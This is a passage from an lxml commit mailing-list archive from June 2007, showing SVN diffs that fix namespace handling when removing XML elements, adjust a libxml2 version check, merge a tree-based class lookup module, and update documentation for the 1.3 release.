is NULL" - return + return 0 c_top = getDeallocationTop(c_node) if c_top is not NULL: #print "freeing:", c_top.name _removeText(c_top.next) # tail tree.xmlFreeNode(c_top) + return 1 + return 0 cdef xmlNode* getDeallocationTop(xmlNode* c_node): """Return the top of the tree that can be deallocated, or NULL. @@ -184,14 +186,14 @@ ################################################################################ # fix _Document references and namespaces when a node changes documents -cdef void moveNodeToDocument(_Element node, _Document doc): +cdef void moveNodeToDocument(_Document doc, xmlNode* c_element): """Fix the xmlNs pointers of a node and its subtree that were moved. Mainly copied from libxml2's xmlReconciliateNs(). Expects libxml2 doc pointers of node to be correct already, but fixes _Document references. """ + cdef _Element element cdef xmlDoc* c_doc - cdef xmlNode* c_element cdef xmlNode* c_start_node cdef xmlNode* c_node cdef xmlNs** c_ns_new_cache @@ -202,12 +204,10 @@ cdef xmlNs* c_last_del_ns cdef cstd.size_t i, c_cache_size, c_cache_last - c_element = node._c_node - c_doc = c_element.doc - if not tree._isElementOrXInclude(c_element): return + c_doc = c_element.doc c_start_node = c_element c_ns_new_cache = NULL c_ns_old_cache = NULL @@ -301,7 +301,9 @@ # fix _Document reference (may dealloc the original document!) if c_element._private is not NULL: - (<_Element>c_element._private)._doc = doc + element = <_Element>c_element._private + if element._doc is not doc: + element._doc = doc if c_element is c_start_node: break Modified: lxml/trunk/src/lxml/tests/test_elementtree.py ============================================================================== --- lxml/trunk/src/lxml/tests/test_elementtree.py (original) +++ lxml/trunk/src/lxml/tests/test_elementtree.py Fri Jun 22 19:33:41 2007 @@ -1325,6 +1325,22 @@ self.assertXML( '', a) + + def test_remove_ns(self): + Element = self.etree.Element + SubElement = self.etree.SubElement + + a = Element('{http://test}a') + b = SubElement(a, '{http://test}b') + c = SubElement(a, '{http://test}c') + + a.remove(b) + self.assertXML( + '', + a) + self.assertXML( + '', + b) def test_remove_nonexisting(self): Element = self.etree.Element From scoder at codespeak.net Fri Jun 22 19:34:24 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Fri, 22 Jun 2007 19:34:24 +0200 (CEST) Subject: [Lxml-checkins] r44435 - in lxml/branch/lxml-1.3: . src/lxml src/lxml/tests Message-ID: <20070622173424.D95F48125@code0.codespeak.net> Author: scoder Date: Fri Jun 22 19:34:24 2007 New Revision: 44435 Modified: lxml/branch/lxml-1.3/CHANGES.txt lxml/branch/lxml-1.3/src/lxml/apihelpers.pxi lxml/branch/lxml-1.3/src/lxml/etree.pyx lxml/branch/lxml-1.3/src/lxml/proxy.pxi lxml/branch/lxml-1.3/src/lxml/tests/test_elementtree.py lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py Log: trunk merge: make removed nodes ns-self-contained Modified: lxml/branch/lxml-1.3/CHANGES.txt ============================================================================== --- lxml/branch/lxml-1.3/CHANGES.txt (original) +++ lxml/branch/lxml-1.3/CHANGES.txt Fri Jun 22 19:34:24 2007 @@ -27,6 +27,9 @@ Bugs fixed ---------- +* Removing Elements from a tree could make them loose their namespace + declarations + * ``ElementInclude`` didn't honour base URL of original document * Replacing the children slice of an Element would cut off the tails of the Modified: lxml/branch/lxml-1.3/src/lxml/apihelpers.pxi ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/apihelpers.pxi (original) +++ lxml/branch/lxml-1.3/src/lxml/apihelpers.pxi Fri Jun 22 19:34:24 2007 @@ -487,14 +487,17 @@ else: return 0 -cdef void _removeNode(xmlNode* c_node): - """Unlink and free a node and subnodes if possible. +cdef void _removeNode(_Document doc, xmlNode* c_node): + """Unlink and free a node and subnodes if possible. Otherwise, make sure + it's self-contained. """ cdef xmlNode* c_next c_next = c_node.next tree.xmlUnlinkNode(c_node) _moveTail(c_next, c_node) - attemptDeallocation(c_node) + if not attemptDeallocation(c_node): + # make namespaces absolute + moveNodeToDocument(doc, c_node) cdef void _moveTail(xmlNode* c_tail, xmlNode* c_target): cdef xmlNode* c_next @@ -522,7 +525,8 @@ c_target = c_new_tail c_tail = _textNodeOrSkip(c_tail.next) -cdef xmlNode* _deleteSlice(xmlNode* c_node, Py_ssize_t start, Py_ssize_t stop): +cdef xmlNode* _deleteSlice(_Document doc, xmlNode* c_node, + Py_ssize_t start, Py_ssize_t stop): """Delete slice, starting with c_node, start counting at start, end at stop. """ cdef xmlNode* c_next @@ -536,7 +540,7 @@ if _isElement(c_node): while c_next is not NULL and not _isElement(c_next): c_next = c_next.next - _removeNode(c_node) + _removeNode(doc, c_node) c = c + 1 c_node = c_next return c_node @@ -555,7 +559,7 @@ _moveTail(c_next, c_node) # uh oh, elements may be pointing to different doc when # parent element has moved; change them too.. - moveNodeToDocument(child, parent._doc) + moveNodeToDocument(parent._doc, c_node) cdef void _appendSibling(_Element element, _Element sibling): """Append a new child to a parent element. @@ -571,7 +575,7 @@ _moveTail(c_next, c_node) # uh oh, elements may be pointing to different doc when # parent element has moved; change them too.. - moveNodeToDocument(sibling, element._doc) + moveNodeToDocument(element._doc, c_node) cdef void _prependSibling(_Element element, _Element sibling): """Append a new child to a parent element. @@ -587,7 +591,7 @@ _moveTail(c_next, c_node) # uh oh, elements may be pointing to different doc when # parent element has moved; change them too.. - moveNodeToDocument(sibling, element._doc) + moveNodeToDocument(element._doc, c_node) cdef int isutf8(char* s): cdef char c Modified: lxml/branch/lxml-1.3/src/lxml/etree.pyx ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/etree.pyx (original) +++ lxml/branch/lxml-1.3/src/lxml/etree.pyx Fri Jun 22 19:34:24 2007 @@ -453,8 +453,9 @@ _removeText(c_node.next) tree.xmlReplaceNode(c_node, element._c_node) _moveTail(c_next, element._c_node) - moveNodeToDocument(element, self._doc) - attemptDeallocation(c_node) + moveNodeToDocument(self._doc, element._c_node) + if not attemptDeallocation(c_node): + moveNodeToDocument(self._doc, c_node) def __delitem__(self, Py_ssize_t index): """Deletes the given subelement. @@ -464,14 +465,14 @@ if c_node is NULL: raise IndexError, index _removeText(c_node.next) - _removeNode(c_node) + _removeNode(self._doc, c_node) def __delslice__(self, Py_ssize_t start, Py_ssize_t stop): """Deletes a number of subelements. """ cdef xmlNode* c_node c_node = _findChild(self._c_node, start) - _deleteSlice(c_node, start, stop) + _deleteSlice(self._doc, c_node, start, stop) def __setslice__(self, Py_ssize_t start, Py_ssize_t stop, value): """Replaces a number of subelements with elements @@ -487,7 +488,7 @@ c_node = _findChild(self._c_node, start) # now delete the slice if c_node is not NULL and start != stop: - c_node = _deleteSlice(c_node, start, stop) + c_node = _deleteSlice(self._doc, c_node, start, stop) # if the insertion point is at the end, append there if c_node is NULL: for element in value: @@ -505,7 +506,7 @@ # and move tail just behind his node _moveTail(c_next, element._c_node) # move it into a new document - moveNodeToDocument(element, self._doc) + moveNodeToDocument(self._doc, element._c_node) def __deepcopy__(self, memo): return self.__copy__() @@ -599,7 +600,7 @@ if _isElement(c_node): while c_node_next is not NULL and not _isElement(c_node_next): c_node_next = c_node_next.next - _removeNode(c_node) + _removeNode(self._doc, c_node) c_node = c_node_next def insert(self, index, _Element element not None): @@ -614,7 +615,7 @@ c_next = element._c_node.next tree.xmlAddPrevSibling(c_node, element._c_node) _moveTail(c_next, element._c_node) - moveNodeToDocument(element, self._doc) + moveNodeToDocument(self._doc, element._c_node) def remove(self, _Element element not None): """Removes a matching subelement. Unlike the find methods, this @@ -629,6 +630,7 @@ c_next = element._c_node.next tree.xmlUnlinkNode(c_node) _moveTail(c_next, c_node) + moveNodeToDocument(self._doc, c_node) def replace(self, _Element old_element not None, _Element new_element not None): @@ -647,7 +649,7 @@ tree.xmlReplaceNode(c_old_node, c_new_node) _moveTail(c_new_next, c_new_node) _moveTail(c_old_next, c_old_node) - moveNodeToDocument(new_element, self._doc) + moveNodeToDocument(self._doc, c_new_node) # PROPERTIES property tag: Modified: lxml/branch/lxml-1.3/src/lxml/proxy.pxi ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/proxy.pxi (original) +++ lxml/branch/lxml-1.3/src/lxml/proxy.pxi Fri Jun 22 19:34:24 2007 @@ -116,19 +116,21 @@ ################################################################################ # support for freeing tree elements when proxy objects are destroyed -cdef void attemptDeallocation(xmlNode* c_node): +cdef int attemptDeallocation(xmlNode* c_node): """Attempt deallocation of c_node (or higher up in tree). """ cdef xmlNode* c_top # could be we actually aren't referring to the tree at all if c_node is NULL: #print "not freeing, node is NULL" - return + return 0 c_top = getDeallocationTop(c_node) if c_top is not NULL: #print "freeing:", c_top.name _removeText(c_top.next) # tail tree.xmlFreeNode(c_top) + return 1 + return 0 cdef xmlNode* getDeallocationTop(xmlNode* c_node): """Return the top of the tree that can be deallocated, or NULL. @@ -184,14 +186,14 @@ ################################################################################ # fix _Document references and namespaces when a node changes documents -cdef void moveNodeToDocument(_Element node, _Document doc): +cdef void moveNodeToDocument(_Document doc, xmlNode* c_element): """Fix the xmlNs pointers of a node and its subtree that were moved. Mainly copied from libxml2's xmlReconciliateNs(). Expects libxml2 doc pointers of node to be correct already, but fixes _Document references. """ + cdef _Element element cdef xmlDoc* c_doc - cdef xmlNode* c_element cdef xmlNode* c_start_node cdef xmlNode* c_node cdef xmlNs** c_ns_new_cache @@ -202,12 +204,10 @@ cdef xmlNs* c_last_del_ns cdef cstd.size_t i, c_cache_size, c_cache_last - c_element = node._c_node - c_doc = c_element.doc - if not tree._isElementOrXInclude(c_element): return + c_doc = c_element.doc c_start_node = c_element c_ns_new_cache = NULL c_ns_old_cache = NULL @@ -301,7 +301,9 @@ # fix _Document reference (may dealloc the original document!) if c_element._private is not NULL: - (<_Element>c_element._private)._doc = doc + element = <_Element>c_element._private + if element._doc is not doc: + element._doc = doc if c_element is c_start_node: break Modified: lxml/branch/lxml-1.3/src/lxml/tests/test_elementtree.py ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/tests/test_elementtree.py (original) +++ lxml/branch/lxml-1.3/src/lxml/tests/test_elementtree.py Fri Jun 22 19:34:24 2007 @@ -1325,6 +1325,22 @@ self.assertXML( '', a) + + def test_remove_ns(self): + Element = self.etree.Element + SubElement = self.etree.SubElement + + a = Element('{http://test}a') + b = SubElement(a, '{http://test}b') + c = SubElement(a, '{http://test}c') + + a.remove(b) + self.assertXML( + '', + a) + self.assertXML( + '', + b) def test_remove_nonexisting(self): Element = self.etree.Element Modified: lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py (original) +++ lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py Fri Jun 22 19:34:24 2007 @@ -1362,7 +1362,7 @@ def test_sourceline_parse(self): parse = self.etree.parse - tree = parse(fileInTestDir('test_xinclude.xml')) + tree = parse(fileInTestDir('include/test_xinclude.xml')) self.assertEquals( [1, 2, 3], From scoder at codespeak.net Fri Jun 22 19:52:33 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Fri, 22 Jun 2007 19:52:33 +0200 (CEST) Subject: [Lxml-checkins] r44436 - lxml/trunk/src/lxml Message-ID: <20070622175233.2EEC78124@code0.codespeak.net> Author: scoder Date: Fri Jun 22 19:52:31 2007 New Revision: 44436 Modified: lxml/trunk/src/lxml/xmlschema.pxi Log: off-by-one version check Modified: lxml/trunk/src/lxml/xmlschema.pxi ============================================================================== --- lxml/trunk/src/lxml/xmlschema.pxi (original) +++ lxml/trunk/src/lxml/xmlschema.pxi Fri Jun 22 19:52:31 2007 @@ -61,7 +61,7 @@ if parser_ctxt is not NULL: self._c_schema = xmlschema.xmlSchemaParse(parser_ctxt) - if _LIBXML_VERSION_INT > 20624: + if _LIBXML_VERSION_INT >= 20624: xmlschema.xmlSchemaFreeParserCtxt(parser_ctxt) self._error_log.disconnect() From scoder at codespeak.net Fri Jun 22 20:20:24 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Fri, 22 Jun 2007 20:20:24 +0200 (CEST) Subject: [Lxml-checkins] r44437 - in lxml/branch/lxml-1.3: . doc src/lxml src/lxml/tests Message-ID: <20070622182024.11305811F@code0.codespeak.net> Author: scoder Date: Fri Jun 22 20:20:24 2007 New Revision: 44437 Added: lxml/branch/lxml-1.3/src/lxml/pyclasslookup.pyx - copied unchanged from r44436, lxml/trunk/src/lxml/pyclasslookup.pyx lxml/branch/lxml-1.3/src/lxml/tests/test_pyclasslookup.py - copied unchanged from r44436, lxml/trunk/src/lxml/tests/test_pyclasslookup.py Modified: lxml/branch/lxml-1.3/CHANGES.txt lxml/branch/lxml-1.3/doc/element_classes.txt lxml/branch/lxml-1.3/setupinfo.py Log: merged in pyclasslookup from trunk Modified: lxml/branch/lxml-1.3/CHANGES.txt ============================================================================== --- lxml/branch/lxml-1.3/CHANGES.txt (original) +++ lxml/branch/lxml-1.3/CHANGES.txt Fri Jun 22 20:20:24 2007 @@ -8,6 +8,9 @@ Features added -------------- +* Module ``lxml.pyclasslookup`` implemens an Element class lookup scheme that + can access the entire tree to determine a suitable Element class + * Parsers take a ``remove_comments`` keyword argument that skips over comments * ``parse()`` function in ``objectify``, corresponding to ``XML()`` etc. Modified: lxml/branch/lxml-1.3/doc/element_classes.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/element_classes.txt (original) +++ lxml/branch/lxml-1.3/doc/element_classes.txt Fri Jun 22 20:20:24 2007 @@ -91,7 +91,8 @@ >>> parser.setElementClassLookup(parser_lookup) There is one drawback of the parser based scheme: the ``Element()`` factory -creates a new document that deploys the default parser:: +does not know about your specialised parser and creates a new document that +deploys the default parser:: >>> el = etree.Element("root") >>> print isinstance(el, HonkElement) @@ -234,8 +235,8 @@ Custom element class lookup --------------------------- -This is the most customisable way of finding element classes. It allows you -to implement a custom lookup scheme in a subclass:: +This is the most customisable way of finding element classes on a per-element +basis. It allows you to implement a custom lookup scheme in a subclass:: >>> class MyLookup(etree.CustomElementClassLookup): ... def lookup(self, node_type, document, namespace, name): @@ -253,6 +254,45 @@ per-parser setup. +Tree based element class lookup in Python +......................................... + +Taking more elaborate decisions than allowed by the custom scheme is difficult +to achieve in pure Python. It would require access to the tree - before the +elements in the tree have been instantiated as Python Element objects. + +Luckily, there is a way to do this. The separate module +``lxml.pyclasslookup`` provides a lookup class called +``PythonElementClassLookup`` that works similar to the custom lookup scheme:: + + >>> from lxml.pyclasslookup import PythonElementClassLookup + >>> class MyLookup(PythonElementClassLookup): + ... def lookup(self, document, element): + ... return MyElementClass # defined elsewhere + + >>> parser = etree.XMLParser() + >>> parser.setElementClassLookup(MyLookup()) + +As before, the first argument to the ``lookup()`` method is the opaque +document instance that contains the Element. The second arguments is a +lightweight Element proxy implementation that is only valid during the lookup. +Do not try to keep a reference to it. Once the lookup is finished, the proxy +will become invalid. You will get an ``AssertionError`` if you access any of +the properties or methods outside the scope of the lookup call where they were +instantiated. + +During the lookup, the element object behaves mostly like a normal Element +instance. It provides the properties ``tag``, ``text``, ``tail`` etc. and +supports indexing, slicing and the ``getchildren()``, ``getparent()`` +etc. methods. It does *not* support iteration, nor does it support any kind +of modification. All of its properties are read-only and it cannot be removed +or inserted into other trees. You can use it as a starting point to freely +traverse the tree and collect any kind of information that its elements +provide. Once you have taken the decision which class to use for this +element, you can simply return it and have lxml take care of cleaning up the +instantiated proxy classes. + + Implementing namespaces ======================= Modified: lxml/branch/lxml-1.3/setupinfo.py ============================================================================== --- lxml/branch/lxml-1.3/setupinfo.py (original) +++ lxml/branch/lxml-1.3/setupinfo.py Fri Jun 22 20:20:24 2007 @@ -8,8 +8,9 @@ PYREX_INSTALLED = False EXT_MODULES = [ - ("etree", "lxml.etree"), - ("objectify", "lxml.objectify") + ("etree", "lxml.etree"), + ("objectify", "lxml.objectify"), + ("pyclasslookup", "lxml.pyclasslookup") ] From scoder at codespeak.net Fri Jun 22 22:09:24 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Fri, 22 Jun 2007 22:09:24 +0200 (CEST) Subject: [Lxml-checkins] r44442 - in lxml/branch/lxml-1.3/doc: . html Message-ID: <20070622200924.9691280EE@code0.codespeak.net> Author: scoder Date: Fri Jun 22 22:09:24 2007 New Revision: 44442 Modified: lxml/branch/lxml-1.3/doc/html/style.css lxml/branch/lxml-1.3/doc/main.txt Log: doc updates for 1.3 release, some layouting, new front-page eye-catcher Modified: lxml/branch/lxml-1.3/doc/html/style.css ============================================================================== --- lxml/branch/lxml-1.3/doc/html/style.css (original) +++ lxml/branch/lxml-1.3/doc/html/style.css Fri Jun 22 22:09:24 2007 @@ -205,6 +205,12 @@ font-style: italic; } +div.line-block { + font-family: Times, "Times New Roman", serif; + text-align: center; + font-size: 140%; +} + code { color: Black; background-color: #cccccc; Modified: lxml/branch/lxml-1.3/doc/main.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/main.txt (original) +++ lxml/branch/lxml-1.3/doc/main.txt Fri Jun 22 22:09:24 2007 @@ -1,7 +1,15 @@ lxml ==== -.. contents:: +.. meta:: + :description: lxml - the most feature-rich and easy-to-use library for working with XML and HTML in the Python language + :keywords: lxml, etree, objectify, Python, XML, HTML + +| lxml is the most feature-rich +| and easy-to-use library +| for working with XML and HTML +| in the Python language. + .. 1 Introduction 2 Documentation @@ -14,9 +22,11 @@ Introduction ------------ -lxml is a Pythonic binding for the libxml2_ and libxslt_ libraries. See the -introduction_ for more information about background and goals. Some common -questions are answered in the FAQ_. +lxml is a Pythonic binding for the libxml2_ and libxslt_ libraries. It is +unique in that it combines the speed and feature completeness of these +libraries with the simplicity of a native Python API. See the introduction_ +for more information about background and goals. Some common questions are +answered in the FAQ_. .. _libxml2: http://xmlsoft.org .. _libxslt: http://xmlsoft.org/XSLT @@ -119,11 +129,9 @@ .. _`lxml at the Python cheeseshop`: http://cheeseshop.python.org/pypi/lxml/ .. _`this key`: pubkey.asc -The latest version is `lxml 1.3beta`_, released 2007-02-27 (`changes for 1.3beta`_). +The latest version is `lxml 1.3`_, released 2007-06-XX (`changes for 1.3`_). `Older versions`_ are listed below. -.. _`lxml 1.3beta`: lxml-1.3beta.tgz -.. _`CHANGES for 1.3beta`: changes-1.3beta.html .. _`Older versions`: #old-versions Please take a look at the `installation instructions`_! @@ -150,7 +158,11 @@ Questions? Suggestions? Code to contribute? We have a `mailing list`_. +You can search the archive with Gmane_ or Google_. + .. _`mailing list`: http://codespeak.net/mailman/listinfo/lxml-dev +.. _Gmane: http://blog.gmane.org/gmane.comp.python.lxml.devel +.. _Google: http://www.google.com/webhp?q=site:codespeak.net/mailman/listinfo/lxml-dev%20 License @@ -200,6 +212,7 @@ * `lxml 0.5`_, released 2005-04-08 +.. _`lxml 1.3`: lxml-1.3.tgz .. _`lxml 1.2.1`: lxml-1.2.1.tgz .. _`lxml 1.2`: lxml-1.2.tgz .. _`lxml 1.1.2`: lxml-1.1.2.tgz @@ -219,6 +232,7 @@ .. _`lxml 0.5.1`: lxml-0.5.1.tgz .. _`lxml 0.5`: lxml-0.5.tgz +.. _`CHANGES for 1.3`: changes-1.3.html .. _`changes for 1.2.1`: changes-1.2.1.html .. _`changes for 1.2`: changes-1.2.html .. _`changes for 1.1.2`: changes-1.1.2.html From scoder at codespeak.net Fri Jun 22 22:13:58 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Fri, 22 Jun 2007 22:13:58 +0200 (CEST) Subject: [Lxml-checkins] r44443 - lxml/branch/lxml-1.3/doc Message-ID: <20070622201358.C0F04812E@code0.codespeak.net> Author: scoder Date: Fri Jun 22 22:13:58 2007 New Revision: 44443 Modified: lxml/branch/lxml-1.3/doc/main.txt Log: link to licenses from docs Modified: lxml/branch/lxml-1.3/doc/main.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/main.txt (original) +++ lxml/branch/lxml-1.3/doc/main.txt Fri Jun 22 22:13:58 2007 @@ -168,10 +168,13 @@ License ------- -The lxml library is shipped under a BSD license. libxml2 and libxslt2 -itself are shipped under the MIT license. There should therefore be no +The lxml library is shipped under a `BSD license`_. libxml2 and libxslt2 +itself are shipped under the `MIT license`_. There should therefore be no obstacle to using lxml in your codebase. +.. _`BSD license`: http://codespeak.net/svn/lxml/trunk/doc/licenses/BSD.txt +.. _`MIT license`: http://www.opensource.org/licenses/mit-license.html + Old Versions ------------ From scoder at codespeak.net Fri Jun 22 22:16:10 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Fri, 22 Jun 2007 22:16:10 +0200 (CEST) Subject: [Lxml-checkins] r44444 - in lxml/trunk/doc: . html Message-ID: <20070622201610.2DBCF812E@code0.codespeak.net> Author: scoder Date: Fri Jun 22 22:16:09 2007 New Revision: 44444 Modified: lxml/trunk/doc/html/style.css lxml/trunk/doc/main.txt Log: merged in release doc updates from 1.3 branch Modified: lxml/trunk/doc/html/style.css ============================================================================== --- lxml/trunk/doc/html/style.css (original) +++ lxml/trunk/doc/html/style.css Fri Jun 22 22:16:09 2007 @@ -205,6 +205,12 @@ font-style: italic; } +div.line-block { + font-family: Times, "Times New Roman", serif; + text-align: center; + font-size: 140%; +} + code { color: Black; background-color: #cccccc; Modified: lxml/trunk/doc/main.txt ============================================================================== --- lxml/trunk/doc/main.txt (original) +++ lxml/trunk/doc/main.txt Fri Jun 22 22:16:09 2007 @@ -1,7 +1,15 @@ lxml ==== -.. contents:: +.. meta:: + :description: lxml - the most feature-rich and easy-to-use library for working with XML and HTML in the Python language + :keywords: lxml, etree, objectify, Python, XML, HTML + +| lxml is the most feature-rich +| and easy-to-use library +| for working with XML and HTML +| in the Python language. + .. 1 Introduction 2 Documentation @@ -14,9 +22,11 @@ Introduction ------------ -lxml is a Pythonic binding for the libxml2_ and libxslt_ libraries. See the -introduction_ for more information about background and goals. Some common -questions are answered in the FAQ_. +lxml is a Pythonic binding for the libxml2_ and libxslt_ libraries. It is +unique in that it combines the speed and feature completeness of these +libraries with the simplicity of a native Python API. See the introduction_ +for more information about background and goals. Some common questions are +answered in the FAQ_. .. _libxml2: http://xmlsoft.org .. _libxslt: http://xmlsoft.org/XSLT @@ -119,11 +129,9 @@ .. _`lxml at the Python cheeseshop`: http://cheeseshop.python.org/pypi/lxml/ .. _`this key`: pubkey.asc -The latest version is `lxml 1.3beta`_, released 2007-02-27 (`changes for 1.3beta`_). +The latest version is `lxml 1.3`_, released 2007-06-XX (`changes for 1.3`_). `Older versions`_ are listed below. -.. _`lxml 1.3beta`: lxml-1.3beta.tgz -.. _`CHANGES for 1.3beta`: changes-1.3beta.html .. _`Older versions`: #old-versions Please take a look at the `installation instructions`_! @@ -150,16 +158,23 @@ Questions? Suggestions? Code to contribute? We have a `mailing list`_. +You can search the archive with Gmane_ or Google_. + .. _`mailing list`: http://codespeak.net/mailman/listinfo/lxml-dev +.. _Gmane: http://blog.gmane.org/gmane.comp.python.lxml.devel +.. _Google: http://www.google.com/webhp?q=site:codespeak.net/mailman/listinfo/lxml-dev%20 License ------- -The lxml library is shipped under a BSD license. libxml2 and libxslt2 -itself are shipped under the MIT license. There should therefore be no +The lxml library is shipped under a `BSD license`_. libxml2 and libxslt2 +itself are shipped under the `MIT license`_. There should therefore be no obstacle to using lxml in your codebase. +.. _`BSD license`: http://codespeak.net/svn/lxml/trunk/doc/licenses/BSD.txt +.. _`MIT license`: http://www.opensource.org/licenses/mit-license.html + Old Versions ------------ @@ -200,6 +215,7 @@ * `lxml 0.5`_, released 2005-04-08 +.. _`lxml 1.3`: lxml-1.3.tgz .. _`lxml 1.2.1`: lxml-1.2.1.tgz .. _`lxml 1.2`: lxml-1.2.tgz .. _`lxml 1.1.2`: lxml-1.1.2.tgz @@ -219,6 +235,7 @@ .. _`lxml 0.5.1`: lxml-0.5.1.tgz .. _`lxml 0.5`: lxml-0.5.tgz +.. _`CHANGES for 1.3`: changes-1.3.html .. _`changes for 1.2.1`: changes-1.2.1.html .. _`changes for 1.2`: changes-1.2.html .. _`changes for 1.1.2`: changes-1.1.2.html From scoder at codespeak.net Sat Jun 23 09:31:48 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Sat, 23 Jun 2007 09:31:48 +0200 (CEST) Subject: [Lxml-checkins] r44460 - lxml/trunk/src/lxml Message-ID: <20070623073148.951788143@code0.codespeak.net> Author: scoder Date: Sat Jun 23 09:31:46 2007 New Revision: 44460 Modified: lxml/trunk/src/lxml/builder.py Log: pass a makeelement() function instead of a parser Modified: lxml/trunk/src/lxml/builder.py ============================================================================== --- lxml/trunk/src/lxml/builder.py (original) +++ lxml/trunk/src/lxml/builder.py Sat Jun 23 09:31:46 2007 @@ -121,9 +121,10 @@ """ - def __init__(self, typemap=None, parser=None): - if parser is not None: - self._makeelement = parser.makeelement + def __init__(self, typemap=None, makeelement=None): + if makeelement is not None: + assert callable(makeelement) + self._makeelement = makeelement else: self._makeelement = ET.Element From scoder at codespeak.net Sat Jun 23 09:31:48 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Sat, 23 Jun 2007 09:31:48 +0200 (CEST) Subject: [Lxml-checkins] r44461 - lxml/branch/lxml-1.3/src/lxml Message-ID: <20070623073148.A5F2A8141@code0.codespeak.net> Author: scoder Date: Sat Jun 23 09:31:48 2007 New Revision: 44461 Modified: lxml/branch/lxml-1.3/src/lxml/builder.py Log: pass a makeelement() function instead of a parser Modified: lxml/branch/lxml-1.3/src/lxml/builder.py ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/builder.py (original) +++ lxml/branch/lxml-1.3/src/lxml/builder.py Sat Jun 23 09:31:48 2007 @@ -121,9 +121,10 @@ """ - def __init__(self, typemap=None, parser=None): - if parser is not None: - self._makeelement = parser.makeelement + def __init__(self, typemap=None, makeelement=None): + if makeelement is not None: + assert callable(makeelement) + self._makeelement = makeelement else: self._makeelement = ET.Element From scoder at codespeak.net Sat Jun 23 09:31:54 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Sat, 23 Jun 2007 09:31:54 +0200 (CEST) Subject: [Lxml-checkins] r44462 - lxml/branch/html/src/lxml Message-ID: <20070623073154.48E07814C@code0.codespeak.net> Author: scoder Date: Sat Jun 23 09:31:54 2007 New Revision: 44462 Modified: lxml/branch/html/src/lxml/builder.py Log: pass a makeelement() function instead of a parser Modified: lxml/branch/html/src/lxml/builder.py ============================================================================== --- lxml/branch/html/src/lxml/builder.py (original) +++ lxml/branch/html/src/lxml/builder.py Sat Jun 23 09:31:54 2007 @@ -94,9 +94,10 @@ """ - def __init__(self, typemap=None, parser=None): - if parser is not None: - self._makeelement = parser.makeelement + def __init__(self, typemap=None, makeelement=None): + if makeelement is not None: + assert callable(makeelement) + self._makeelement = makeelement else: self._makeelement = ET.Element From scoder at codespeak.net Sat Jun 23 09:46:37 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Sat, 23 Jun 2007 09:46:37 +0200 (CEST) Subject: [Lxml-checkins] r44463 - lxml/branch/lxml-1.3 Message-ID: <20070623074637.29A0E813E@code0.codespeak.net> Author: scoder Date: Sat Jun 23 09:46:36 2007 New Revision: 44463 Removed: lxml/branch/lxml-1.3/Pyrex-0.9.4.1-public-api.patch Log: drop Pyrex patch - not sufficient anyway Deleted: /lxml/branch/lxml-1.3/Pyrex-0.9.4.1-public-api.patch ============================================================================== --- /lxml/branch/lxml-1.3/Pyrex-0.9.4.1-public-api.patch Sat Jun 23 09:46:36 2007 +++ (empty file) @@ -1,239 +0,0 @@ -Index: Pyrex/Compiler/Nodes.py -=================================================================== ---- Pyrex/Compiler/Nodes.py (Revision 151) -+++ Pyrex/Compiler/Nodes.py (Arbeitskopie) -@@ -114,24 +114,28 @@ - self.generate_h_code(env, result) - - def generate_h_code(self, env, result): -- public_vars_and_funcs = [] -+ public_vars = [] -+ public_funcs = [] - public_extension_types = [] - for entry in env.var_entries: - if entry.visibility == 'public': -- public_vars_and_funcs.append(entry) -+ public_vars.append(entry) - for entry in env.cfunc_entries: - if entry.visibility == 'public': -- public_vars_and_funcs.append(entry) -+ public_funcs.append(entry) - for entry in env.c_class_entries: - if entry.visibility == 'public': - public_extension_types.append(entry) -- if public_vars_and_funcs or public_extension_types: -+ if public_vars or public_funcs or public_extension_types: - result.h_file = replace_suffix(result.c_file, ".h") - result.i_file = replace_suffix(result.c_file, ".pxi") - h_code = Code.CCodeWriter(result.h_file) - i_code = Code.PyrexCodeWriter(result.i_file) -+ header_barrier = "__HAS_PYX_" + env.module_name -+ h_code.putln("#ifndef %s" % header_barrier) -+ h_code.putln("#define %s" % header_barrier) - self.generate_extern_c_macro_definition(h_code) -- for entry in public_vars_and_funcs: -+ for entry in public_vars: - h_code.putln("%s %s;" % ( - Naming.extern_c_macro, - entry.type.declaration_code( -@@ -141,7 +145,23 @@ - for entry in public_extension_types: - self.generate_cclass_header_code(entry.type, h_code) - self.generate_cclass_include_code(entry.type, i_code) -+ if public_funcs: -+ for entry in public_funcs: -+ h_code.putln( -+ 'static %s;' % -+ entry.type.declaration_code("(*%s)" % entry.cname)) -+ i_code.putln("cdef extern %s" % -+ entry.type.declaration_code(entry.cname, pyrex = 1)) -+ h_code.putln( -+ "static struct {char *s; void **p;} _%s_API[] = {" % -+ env.module_name) -+ for entry in public_funcs: -+ h_code.putln('{"%s", &%s},' % (entry.cname, entry.cname)) -+ h_code.putln("{0, 0}") -+ h_code.putln("};") -+ self.generate_c_api_import_code(env, h_code) - h_code.putln("PyMODINIT_FUNC init%s(void);" % env.module_name) -+ h_code.putln("#endif /* %s */" % header_barrier) - - def generate_cclass_header_code(self, type, h_code): - #h_code.putln("extern DL_IMPORT(PyTypeObject) %s;" % type.typeobj_cname) -@@ -180,6 +200,7 @@ - self.body.generate_function_definitions(env, code) - self.generate_interned_name_table(env, code) - self.generate_py_string_table(env, code) -+ self.generate_c_api_table(env, code) - self.generate_typeobj_definitions(env, code) - self.generate_method_table(env, code) - self.generate_filename_init_prototype(code) -@@ -437,10 +458,12 @@ - dll_linkage = None - header = 